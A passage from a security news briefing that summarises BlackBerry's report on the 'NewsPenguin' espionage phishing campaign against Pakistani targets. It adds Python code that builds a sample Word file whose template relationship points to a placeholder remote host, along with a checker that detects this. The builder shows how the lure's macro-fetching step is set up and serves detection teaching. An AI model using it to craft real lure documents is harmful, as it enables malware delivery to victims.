At a glance.
- Pakistan's navy under cyberattack.
- New criminal threat-actor uses screenshots for recon.
- ESXiArgs: widespread, but effects still being assessed.
- Phishing campaign pursues Ukrainian and Polish targets.
Pakistan's navy under cyberattack.
BlackBerry blogged today about a new threat actor it calls "NewsPenguin," seen targeting Pakistani organizations. Using the Pakistan Navy's upcoming International Maritime Expo & Conference as a phishing lure, the actor attaches a malicious document that uses "a remote template injection technique and embedded malicious Visual Basic for Applications (VBA) macro code to deliver the next stage of the attack, which leads to the final payload execution," the researchers say. The eventual payload is XOR-encrypted with the key "penguin," and the Content-Disposition header of the HTTP response that delivers it carries the name "getlatestnews"; the researchers combined the two strings into the actor's name. "NewsPenguin is a previously unknown threat actor relying on unseen tooling to target Pakistani users and potential visitors of the Pakistani International Maritime Expo & Conference," BlackBerry says. There is no attribution so far, but BlackBerry assesses that NewsPenguin's motivation is espionage rather than profit.
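The remote template injection the researchers describe relies on a relationship inside the Office document package that points Word at a template on an external server; when the file opens, Word fetches that template, and the macro can ride in with it rather than sitting in the lure itself. As an added example, not code from BlackBerry's report or from the NewsPenguin tooling, the Python below builds a constructed minimal .docx carrying such a relationship and a checker that flags it. The template URL (a TEST-NET address), file names and relationship IDs are placeholders, not indicators from the report.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# OOXML relationship type that attaches a template (.dotm) to a document.
# In the remote-template-injection pattern this relationship has
# TargetMode="External" and a URL target, so Word fetches the template
# (and any macro it carries) from the network when the file opens.
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REMOTE_SCHEMES = {"http", "https", "ftp"}


def build_docx(template_target=None):
    """Construct a minimal .docx in memory (constructed sample, not a real
    lure). When template_target is given, add the settings.xml.rels
    relationship that makes Word load that template on open."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0" encoding="UTF-8"?>'
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<?xml version="1.0" encoding="UTF-8"?>'
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/settings.xml",
                   '<?xml version="1.0" encoding="UTF-8"?>'
                   '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
                   ' xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
                   + ('<w:attachedTemplate r:id="rId1"/>' if template_target else "")
                   + '</w:settings>')
        if template_target:
            z.writestr("word/_rels/settings.xml.rels",
                       '<?xml version="1.0" encoding="UTF-8"?>'
                       f'<Relationships xmlns="{PKG_NS}">'
                       f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}"'
                       f' Target="{template_target}" TargetMode="External"/>'
                       '</Relationships>')
    return buf.getvalue()


def find_attached_templates(docx_bytes):
    """Scan every .rels part of a .docx for attachedTemplate relationships.
    Returns a list of (rels_part, target, is_remote). A remote (http/https/ftp)
    target is the injection indicator; a local path is ordinary Word behaviour
    and is reported with is_remote=False so an analyst can still see it."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter(f"{{{PKG_NS}}}Relationship"):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                target = rel.get("Target", "")
                scheme = urlparse(target).scheme.lower()
                is_remote = (rel.get("TargetMode") == "External"
                             and scheme in REMOTE_SCHEMES)
                findings.append((part, target, is_remote))
    return findings


def has_macro_project(docx_bytes):
    """True if the package itself embeds a VBA project (word/vbaProject.bin).
    With remote template injection the lure may be macro-free and the macro
    arrives in the fetched template, so a macro scan alone is not enough."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return "word/vbaProject.bin" in z.namelist()


if __name__ == "__main__":
    # Placeholder URL on a TEST-NET address; not an indicator from the report.
    sample = build_docx("http://203.0.113.10/template.dotm")
    for part, target, remote in find_attached_templates(sample):
        print(f"{part}: {target} remote={remote}")
    print("embedded VBA project:", has_macro_project(sample))
```

The checker walks every `.rels` part rather than only `word/_rels/settings.xml.rels`, because the attachment relationship is what matters, not where the package author put it. A document that carries no `vbaProject.bin` but does carry an external `attachedTemplate` target is exactly the shape that defeats a static macro check, which is why the two results are reported separately.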